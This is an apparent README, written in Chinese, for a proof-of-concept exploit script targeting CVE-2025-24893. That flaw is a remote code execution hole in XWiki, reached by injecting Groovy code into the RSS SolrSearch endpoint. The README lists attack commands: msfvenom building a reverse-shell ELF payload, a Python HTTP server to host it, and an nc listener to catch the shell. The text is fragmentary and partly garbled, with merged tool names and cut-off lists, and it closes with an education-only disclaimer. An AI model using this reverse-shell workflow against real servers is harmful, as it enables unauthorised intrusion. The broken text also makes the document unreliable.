该Python脚本利用CVE-2025-24893漏洞——XWiki因异步渲染Groovy宏时沙箱机制不完善导致的远程代码执行(RCE)漏洞。它通过向基于RSS的SolrSearch端点注入代码,实现任意命令执行。
msfvenom)克隆或下载脚本。
请确保已安装以下组件:
msfvenomjq(用于bash载荷)运行脚本:
python3 CVE-2025-24893-PoC.py
从菜单中选择:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=<beacon_port> -f elf -o rev
python3 -m http.server 8080
nc -lvnp 31337
脚本向目标发送以下序列:
此工具仅用于教育和授权测试目的。在未拥有或未获得明确许可的系统上使用此工具是非法且不道德的。